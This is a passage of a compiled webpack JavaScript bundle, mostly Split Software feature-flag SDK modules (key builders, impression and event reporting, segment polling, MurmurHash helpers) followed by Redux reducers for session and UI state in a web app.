  if (listName === void 0) {
    listName = 'split_names';
  }

  if (item === void 0) {
    item = 'split name';
  }

  if (Array.isArray(maybeSplits) && maybeSplits.length > 0) {
    var validatedArray = []; // Remove invalid values

    maybeSplits.forEach(function (maybeSplit) {
      var splitName = Object(__WEBPACK_IMPORTED_MODULE_2__split__["a" /* validateSplit */])(maybeSplit, method, item);
      if (splitName) validatedArray.push(splitName);
    }); // Strip off duplicated values if we have valid split names then return

    if (validatedArray.length) return Object(__WEBPACK_IMPORTED_MODULE_0__lang__["s" /* uniq */])(validatedArray);
  }

  log.error(method + ": " + listName + " must be a non-empty array.");
  return false;
}

/***/ }),
/* 1276 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/**
 * Given a list of conditions, it returns a boolean flagging if those conditions 
 * use segments matchers (rules & whitelists)
 */
function usesSegments(conditions) {
  if (conditions === void 0) {
    conditions = [];
  }

  for (var i = 0; i < conditions.length; i++) {
    var matchers = conditions[i].matcherGroup.matchers;

    for (var j = 0; j < matchers.length; j++) {
      if (matchers[j].matcherType === 'IN_SEGMENT') return true;
    }
  }

  return false;
}

/* harmony default export */ __webpack_exports__["a"] = (usesSegments);

/***/ }),
/* 1277 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = killLocally;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_promise_thenable__ = __webpack_require__(75);

/**
 * Kill `splitName` at `this` split storage, setting `defaultTreatment` and `changeNumber`,
 * only if the split exists and its `changeNumber` is older than the given one.
 * Used for SPLIT_KILL push notifications.
 *
 * @param {string} splitName
 * @param {string} defaultTreatment
 * @param {number} changeNumber
 * @returns {Promise} a promise that is resolved once the split kill is performed.
 * The fulfillment value is a boolean: `true` if the kill success updating the split or `false` if no split is updated, for instance,
 * if the `changeNumber` is old, if the `splitName` is not found, or if the storage fails to apply the update.
 */

function killLocally(splitName, defaultTreatment, changeNumber) {
  var _this = this;

  var split = this.getSplit(splitName);
  var splitPromise = Object(__WEBPACK_IMPORTED_MODULE_0__utils_promise_thenable__["a" /* default */])(split) ? split : Promise.resolve(split);
  return splitPromise.then(function (split) {
    if (split) {
      var parsedSplit = JSON.parse(split);

      if (!parsedSplit.changeNumber || parsedSplit.changeNumber < changeNumber) {
        parsedSplit.killed = true;
        parsedSplit.defaultTreatment = defaultTreatment;
        parsedSplit.changeNumber = changeNumber;
        var newSplit = JSON.stringify(parsedSplit);
        return _this.addSplit(splitName, newSplit);
      }
    }

    return false;
  });
}

/***/ }),
/* 1278 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);

var everythingAtTheEnd = /[^.]+$/;
var everythingAfterCount = /count\.([^/]+)$/;
var latencyMetricNameAndBucket = /latency\.([^/]+)\.bucket\.([0-9]+)$/;

var KeyBuilder = /*#__PURE__*/function () {
  function KeyBuilder(settings) {
    this.settings = settings;
  }

  var _proto = KeyBuilder.prototype;

  _proto.buildSplitKey = function buildSplitKey(splitName) {
    return this.settings.storage.prefix + ".split." + splitName;
  };

  _proto.buildTrafficTypeKey = function buildTrafficTypeKey(trafficType) {
    return this.settings.storage.prefix + ".trafficType." + trafficType;
  };

  _proto.buildSplitsTillKey = function buildSplitsTillKey() {
    return this.settings.storage.prefix + ".splits.till";
  };

  _proto.buildSplitsReady = function buildSplitsReady() {
    return this.settings.storage.prefix + ".splits.ready";
  };

  _proto.isSplitKey = function isSplitKey(key) {
    return Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["o" /* startsWith */])(key, this.settings.storage.prefix + ".split.");
  };

  _proto.buildSegmentNameKey = function buildSegmentNameKey(segmentName) {
    return this.settings.storage.prefix + ".segment." + segmentName;
  };

  _proto.buildSegmentTillKey = function buildSegmentTillKey(segmentName) {
    return this.settings.storage.prefix + ".segment." + segmentName + ".till";
  };

  _proto.buildRegisteredSegmentsKey = function buildRegisteredSegmentsKey() {
    return this.settings.storage.prefix + ".segments.registered";
  };

  _proto.buildSegmentsReady = function buildSegmentsReady() {
    return this.settings.storage.prefix + ".segments.ready";
  };

  _proto.buildVersionablePrefix = function buildVersionablePrefix() {
    return this.settings.storage.prefix + "/" + this.settings.version + "/" + this.settings.runtime.ip;
  };

  _proto.buildImpressionsKey = function buildImpressionsKey() {
    return this.settings.storage.prefix + ".impressions";
  };

  _proto.buildEventsKey = function buildEventsKey() {
    return this.settings.storage.prefix + ".events";
  };

  _proto.buildLatencyKeyPrefix = function buildLatencyKeyPrefix() {
    return this.buildVersionablePrefix() + "/latency";
  };

  _proto.buildLatencyKey = function buildLatencyKey(metricName, bucketNumber) {
    return this.buildLatencyKeyPrefix() + "." + metricName + ".bucket." + bucketNumber;
  };

  _proto.buildCountKey = function buildCountKey(metricName) {
    return this.buildVersionablePrefix() + "/count." + metricName;
  };

  _proto.buildGaugeKey = function buildGaugeKey(metricName) {
    return this.buildVersionablePrefix() + "/gauge." + metricName;
  };

  _proto.searchPatternForCountKeys = function searchPatternForCountKeys() {
    return this.buildVersionablePrefix() + "/count.*";
  };

  _proto.searchPatternForSplitKeys = function searchPatternForSplitKeys() {
    return this.settings.storage.prefix + ".split.*";
  };

  _proto.searchPatternForLatency = function searchPatternForLatency() {
    return this.buildLatencyKeyPrefix() + ".*";
  };

  _proto.extractKey = function extractKey(builtKey) {
    var s = builtKey.match(everythingAtTheEnd);

    if (s && s.length) {
      return s[0];
    } else {
      throw new Error('Invalid latency key provided');
    }
  };

  _proto.extractCounterName = function extractCounterName(counterKey) {
    var m = counterKey.match(everythingAfterCount);

    if (m && m.length) {
      return m[1]; // everything after count
    } else {
      throw new Error('Invalid counter key provided');
    }
  };

  _proto.extractLatencyMetricNameAndBucket = function extractLatencyMetricNameAndBucket(latencyKey) {
    var parts = latencyKey.match(latencyMetricNameAndBucket);

    if (parts && parts.length > 2) {
      return {
        metricName: parts[1],
        bucketNumber: parts[2]
      };
    } else {
      throw new Error('Invalid counter key provided');
    }
  };

  return KeyBuilder;
}();

/* harmony default export */ __webpack_exports__["a"] = (KeyBuilder);

/***/ }),
/* 1279 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/**
 * Verify type of key and return a valid object key used for get treatment for a
 * specific split.
 */

/* harmony default export */ __webpack_exports__["a"] = (function (key) {
  if (Object(__WEBPACK_IMPORTED_MODULE_0__lang__["i" /* isObject */])(key)) {
    return {
      matchingKey: key.matchingKey,
      bucketingKey: key.bucketingKey
    };
  } else {
    return {
      matchingKey: key,
      bucketingKey: key
    };
  }
});

/***/ }),
/* 1280 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__inputValidation__ = __webpack_require__(2790);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_constants__ = __webpack_require__(56);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__ = __webpack_require__(202);





function BrowserClientFactory(context) {
  var _client$track;

  var settings = context.get(context.constants.SETTINGS);
  var maybeKey = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["e" /* get */])(settings, 'core.key', undefined);
  var maybeTT = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["e" /* get */])(settings, 'core.trafficType', undefined);

  if (settings.mode === __WEBPACK_IMPORTED_MODULE_2__utils_constants__["g" /* LOCALHOST_MODE */] && maybeKey === undefined) {
    settings.core.key = 'localhost_key';
  } else {
    settings.core.key = Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["i" /* validateKey */])(maybeKey, 'Client instantiation');
  } // Key is also binded to the .track method. Same thing happens with trafficType but only if present on configs. (not required)


  var trackBindings = [settings.core.key];

  if (maybeTT !== undefined) {
    var tt = Object(__WEBPACK_IMPORTED_MODULE_3__utils_inputValidation__["m" /* validateTrafficType */])(maybeTT, 'Client instantiation');
    settings.core.trafficType = tt;
    trackBindings.push(tt);
  }

  var client = Object(__WEBPACK_IMPORTED_MODULE_1__inputValidation__["a" /* default */])(context, true, trackBindings.length > 1);
  client.isBrowserClient = true; // In the browser land, we can bind the key and the traffic type (if provided)

  client.getTreatment = client.getTreatment.bind(client, settings.core.key);
  client.getTreatmentWithConfig = client.getTreatmentWithConfig.bind(client, settings.core.key);
  client.getTreatments = client.getTreatments.bind(client, settings.core.key);
  client.getTreatmentsWithConfig = client.getTreatmentsWithConfig.bind(client, settings.core.key);
  client.track = (_client$track = client.track).bind.apply(_client$track, [client].concat(trackBindings));
  return client;
}

/* harmony default export */ __webpack_exports__["a"] = (BrowserClientFactory);

/***/ }),
/* 1281 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = _createClass;
function _defineProperties(target, props) {
  for (var i = 0; i < props.length; i++) {
    var descriptor = props[i];
    descriptor.enumerable = descriptor.enumerable || false;
    descriptor.configurable = true;
    if ("value" in descriptor) descriptor.writable = true;
    Object.defineProperty(target, descriptor.key, descriptor);
  }
}

function _createClass(Constructor, protoProps, staticProps) {
  if (protoProps) _defineProperties(Constructor.prototype, protoProps);
  if (staticProps) _defineProperties(Constructor, staticProps);
  return Constructor;
}

/***/ }),
/* 1282 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = zeroSinceHH;
/* harmony export (immutable) */ __webpack_exports__["b"] = zeroSinceSS;
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/
function zeroSinceHH(millisSinceEpoch
/*: number */
)
/*: number */
{
  return new Date(millisSinceEpoch).setUTCHours(0, 0, 0, 0);
}
function zeroSinceSS(millisSinceEpoch
/*: number */
)
/*: number */
{
  return new Date(millisSinceEpoch).setUTCSeconds(0, 0);
}

/***/ }),
/* 1283 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = UTF16ToUTF8;
/* harmony export (immutable) */ __webpack_exports__["c"] = x86Multiply;
/* harmony export (immutable) */ __webpack_exports__["d"] = x86Rotl;
/* harmony export (immutable) */ __webpack_exports__["b"] = x86Fmix;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utfx__ = __webpack_require__(2824);

function UTF16ToUTF8(key) {
  var sd;
  Object(__WEBPACK_IMPORTED_MODULE_0__utfx__["a" /* encodeUTF16toUTF8 */])(Object(__WEBPACK_IMPORTED_MODULE_0__utfx__["c" /* stringSource */])(key), sd = Object(__WEBPACK_IMPORTED_MODULE_0__utfx__["b" /* stringDestination */])());
  return sd();
}
/*!
 * +----------------------------------------------------------------------------------+
 * | murmurHash3.js v3.0.0 (http://github.com/karanlyons/murmurHash3.js)              |
 * | A TypeScript/JavaScript implementation of MurmurHash3's hashing algorithms.      |
 * |----------------------------------------------------------------------------------|
 * | Copyright (c) 2012-2020 Karan Lyons. Freely distributable under the MIT license. |
 * +----------------------------------------------------------------------------------+
 */

function x86Multiply(m, n) {
  //
  // Given two 32bit ints, returns the two multiplied together as a
  // 32bit int.
  //
  return (m & 0xffff) * n + (((m >>> 16) * n & 0xffff) << 16);
}
function x86Rotl(m, n) {
  //
  // Given a 32bit int and an int representing a number of bit positions,
  // returns the 32bit int rotated left by that number of positions.
  //
  return m << n | m >>> 32 - n;
}
function x86Fmix(h) {
  //
  // Given a block, returns murmurHash3's final x86 mix of that block.
  //
  h ^= h >>> 16;
  h = x86Multiply(h, 0x85ebca6b);
  h ^= h >>> 13;
  h = x86Multiply(h, 0xc2b2ae35);
  h ^= h >>> 16;
  return h;
}

/***/ }),
/* 1284 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = truncateTimeFrame;
var DEDUP_WINDOW_SIZE_MS = 3600 * 1000;
/**
* Truncates de time frame received with the time window.
*/

function truncateTimeFrame(timestampInMs) {
  return timestampInMs - timestampInMs % DEDUP_WINDOW_SIZE_MS;
}

/***/ }),
/* 1285 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 1286 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = BULK;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__request__ = __webpack_require__(203);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_constants__ = __webpack_require__(56);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/



function BULK(settings, params) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__request__["a" /* default */])(settings, '/testImpressions/bulk', __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    method: 'POST'
  }, params), {
    SplitSDKImpressionsMode: settings.sync.impressionsMode === __WEBPACK_IMPORTED_MODULE_2__utils_constants__["h" /* OPTIMIZED */] ? __WEBPACK_IMPORTED_MODULE_2__utils_constants__["h" /* OPTIMIZED */] : __WEBPACK_IMPORTED_MODULE_2__utils_constants__["d" /* DEBUG */] // Adding extra headers to send impressions in OPTIMIZED or DEBUG modes.

  });
}

/***/ }),
/* 1287 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = COUNT;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__request__ = __webpack_require__(203);


function COUNT(settings, params) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__request__["a" /* default */])(settings, '/testImpressions/count', __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    method: 'POST'
  }, params));
}

/***/ }),
/* 1288 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = fromImpressionsCollector;
/* harmony export (immutable) */ __webpack_exports__["b"] = fromImpressionsCountCollector;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__utils_lang__ = __webpack_require__(13);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

function fromImpressionsCollector(collector, settings) {
  var sendLabels = settings.core.labelsEnabled;
  var groupedByFeature = Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["g" /* groupBy */])(collector.state(), 'feature');
  var dto = []; // using forOwn instead of for...in since the last also iterates over prototype enumerables

  Object(__WEBPACK_IMPORTED_MODULE_0__utils_lang__["d" /* forOwn */])(groupedByFeature, function (value, name) {
    dto.push({
      f: name,
      // Test Name
      i: value.map(function (entry) {
        // Key Impressions
        var keyImpression = {
          k: entry.keyName,
          // Key
          t: entry.treatment,
          // Treatment
          m: entry.time,
          // Timestamp
          c: entry.changeNumber // ChangeNumber

        };
        if (sendLabels) keyImpression.r = entry.label; // Rule

        if (entry.bucketingKey) keyImpression.b = entry.bucketingKey; // Bucketing Key

        if (entry.pt) keyImpression.pt = entry.pt;
        return keyImpression;
      })
    });
  });
  return dto;
}
function fromImpressionsCountCollector(collector) {
  var imprCounts = collector ? collector.size() : 0;
  var pf = [];
  if (imprCounts === 0) return pf;
  var impressionsCount = collector.popAll();
  var keys = Object.keys(impressionsCount);

  for (var i = 0; i < keys.length; i++) {
    var splitted = keys[i].split('::');
    if (splitted.length !== 2) continue;
    var featureName = splitted[0];
    var timeFrame = splitted[1];
    var impressionsInTimeframe = {
      f: featureName,
      // Test Name
      m: Number(timeFrame),
      // Time Frame
      rc: impressionsCount[keys[i]] // Count

    };
    pf.push(impressionsInTimeframe);
  }

  return pf;
}

/***/ }),
/* 1289 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__transport__ = __webpack_require__(279);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/

/* harmony default export */ __webpack_exports__["a"] = (__WEBPACK_IMPORTED_MODULE_0__transport__["a" /* default */]);

/***/ }),
/* 1290 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = BULK;
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign__ = __webpack_require__(22);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_object_assign___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_object_assign__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__request__ = __webpack_require__(203);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function BULK(settings, params) {
  return Object(__WEBPACK_IMPORTED_MODULE_1__request__["a" /* default */])(settings, '/events/bulk', __WEBPACK_IMPORTED_MODULE_0_object_assign___default()({
    method: 'POST'
  }, params));
}

/***/ }),
/* 1291 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (immutable) */ __webpack_exports__["a"] = getEventSource;
function getEventSource() {
  return typeof EventSource === 'function' ? EventSource : undefined;
}

/***/ }),
/* 1292 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__lang_Errors__ = __webpack_require__(280);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/


function timeout(ms, promise) {
  if (ms < 1) return promise;
  return new Promise(function (resolve, reject) {
    var tid = setTimeout(function () {
      reject(new __WEBPACK_IMPORTED_MODULE_0__lang_Errors__["c" /* SplitTimeoutError */]("Operation timed out because it exceeded the configured time limit of " + ms + "ms."));
    }, ms);
    promise.then(function (res) {
      clearTimeout(tid);
      resolve(res);
    }, function (err) {
      clearTimeout(tid);
      reject(err);
    });
  });
}

/* harmony default export */ __webpack_exports__["a"] = (timeout);

/***/ }),
/* 1293 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__task__ = __webpack_require__(703);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__updater_MySegments__ = __webpack_require__(2874);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__utils_logger__ = __webpack_require__(9);
/**
Copyright 2016 Split Software

Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at

    http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
**/



var log = Object(__WEBPACK_IMPORTED_MODULE_2__utils_logger__["b" /* default */])('splitio-producer:mySegmentsHandler');
/**
 * Incremental updater to be used to share data in the browser.
 */

var PartialBrowserProducer = function PartialBrowserProducer(context) {
  var settings = context.get(context.constants.SETTINGS);
  var splitsStorage = context.get(context.constants.STORAGE).splits;

  var _context$get = context.get(context.constants.READINESS),
      splitsEventEmitter = _context$get.splits,
      segmentsEventEmitter = _context$get.segments;

  var mySegmentsUpdater = Object(__WEBPACK_IMPORTED_MODULE_1__updater_MySegments__["a" /* default */])(context);
  var mySegmentsUpdaterTask = Object(__WEBPACK_IMPORTED_MODULE_0__task__["a" /* default */])(synchronizeMySegments, settings.scheduler.segmentsRefreshRate);
  splitsEventEmitter.on(splitsEventEmitter.SDK_SPLITS_ARRIVED, smartPausing); // needed for shared clients, we run `smartReady` a first time if splits were sync and don't use segments,
  // to emit SDK_SEGMENTS_ARRIVED (and thus SDK_READY) immediately in next event cycle

  if (!splitsStorage.usesSegments()) setTimeout(smartReady, 0);else splitsEventEmitter.once(splitsEventEmitter.SDK_SPLITS_ARRIVED, smartReady);
  var _isSynchronizingMySegments = false;
  /**
   * @param {string[] | undefined} segmentList might be undefined
   * @param {boolean | undefined} noCache true to revalidate data to fetch
   */

  function synchronizeMySegments(segmentList, noCache) {
    _isSynchronizingMySegments = true; // `mySegmentsUpdater` promise always resolves, and with a false value if it fails to fetch or store mySegments

    return mySegmentsUpdater(0, segmentList, noCache).then(function (res) {
      _isSynchronizingMySegments = false;
      return res;
    });
  }

  var running = false; // we cannot rely on `mySegmentsUpdaterTask.isRunning` to check if doing polling

  function isRunning() {
    return running;
  } // emit SDK_SEGMENTS_ARRIVED (and thus SDK_READY) if not ready yet and splits are not using segments


  function smartReady() {
    var isReady = context.get(context.constants.READY, true);
    if (!isReady && !splitsStorage.usesSegments()) segmentsEventEmitter.emit(segmentsEventEmitter.SDK_SEGMENTS_ARRIVED);
  } // smartly pause/resume mySegmentsUpdaterTask while doing polling


  function smartPausing() {
    if (!running) return; // noop if not doing polling

    var splitsHaveSegments = splitsStorage.usesSegments();

    if (splitsHaveSegments !== mySegmentsUpdaterTask.isRunning()) {
      log.info("Turning segments data polling " + (splitsHaveSegments ? 'ON' : 'OFF') + ".");

      if (splitsHaveSegments) {
        mySegmentsUpdaterTask.start();
      } else {
        mySegmentsUpdaterTask.stop();
      }
    }
  }

  return {
    // Start periodic fetching (polling)
    start: function start() {
      running = true;
      if (splitsStorage.usesSegments()) mySegmentsUpdaterTask.start();
    },
    // Stop periodic fetching (polling)
    stop: function stop() {
      running = false;
      mySegmentsUpdaterTask.stop();
    },
    // Used by SyncManager to know if running in polling mode.
    isRunning: isRunning,
    // Used by MySegmentUpdateWorker
    isSynchronizingMySegments: function isSynchronizingMySegments() {
      return _isSynchronizingMySegments;
    },
    synchronizeMySegments: synchronizeMySegments
  };
};

/* harmony default export */ __webpack_exports__["a"] = (PartialBrowserProducer);

/***/ }),
/* 1294 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export timeoutWarning */
/* unused harmony export serverTimeout */
/* unused harmony export options */
/* unused harmony export activity */
/* unused harmony export routeHistory */
/* unused harmony export confirmation */
/* unused harmony export loading */
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return serialize; });
/* unused harmony export isLoggedIn */
/* unused harmony export userCredentials */
/* unused harmony export statusMessage */
/* unused harmony export loadingLogin */
/* unused harmony export mfa */
/* unused harmony export didAcceptTerms */
/* unused harmony export createPasswordAttempt */
/* unused harmony export passwordValidation */
/* unused harmony export intendedPath */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms__ = __webpack_require__(216);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_ms___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_ms__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_isnil__ = __webpack_require__(2892);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_lodash_isnil___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_1_lodash_isnil__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_immutable__ = __webpack_require__(1);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_immutable__ = __webpack_require__(20);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_redux_immutable___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_3_redux_immutable__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_utils__ = __webpack_require__(5);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__action_types_js__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_6__constants__ = __webpack_require__(172);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_7__action_types__ = __webpack_require__(134);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_8__web_modules_trustar_utils__ = __webpack_require__(5);















var timeoutWarning = function timeoutWarning() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : false;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["SET_TIMEOUT_WARNING"]:
      return payload;
    default:
      return state;
  }
};

var serverTimeout = function serverTimeout() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : __WEBPACK_IMPORTED_MODULE_0_ms___default()('16m');
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;


  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["FETCH_SERVER_SESSION_TIMEOUT_SUCCESS"]:
      return __WEBPACK_IMPORTED_MODULE_0_ms___default()(String(payload) + 's'); // Payload is a number
    default:
      return state;
  }
};

var Options = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Map"])({
  theme: 'light'
});

var options = function options() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Options;
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["SET_OPTIONS"]:
      return state.merge(payload);
    default:
      return state;
  }
};

var Activity = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  visitedConstellation: false,
  visitedDashboard: false,
  visitedExplore: false,
  visitedReports: false,
  visitedEntities: false
});

var activity = function activity() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Activity();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["SET_ACTIVITY"]:
      return state.merge(payload);
    default:
      return state;
  }
};

/* Records route history of current app session
 *
 * NOTE: This records whatever route history exists during a user session.
 * We don't user this beyond retrieving the 'last' route for now... could refactor
 * this later to limit to last 10 routes, although it's unlikely a user is going
 * to visit 100s of routes in a single session. But this does explicitly consume
 * memory we're not explicitly using at the moment.
 */
var routeHistory = function routeHistory() {
  var state = arguments.length > 0 && arguments[0] !== undefined ? arguments[0] : Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["List"])();
  var action = arguments[1];
  var type = action.type,
      payload = action.payload;

  switch (type) {
    case __WEBPACK_IMPORTED_MODULE_5__action_types_js__["SET_LAST_ROUTE"]:
      return state.push(payload);
    default:
      return state;
  }
};

/* State to track confirmation modal */
var Confirmation = Object(__WEBPACK_IMPORTED_MODULE_2_immutable__["Record"])({
  visible: true,
  message: '',
  accept: null
});

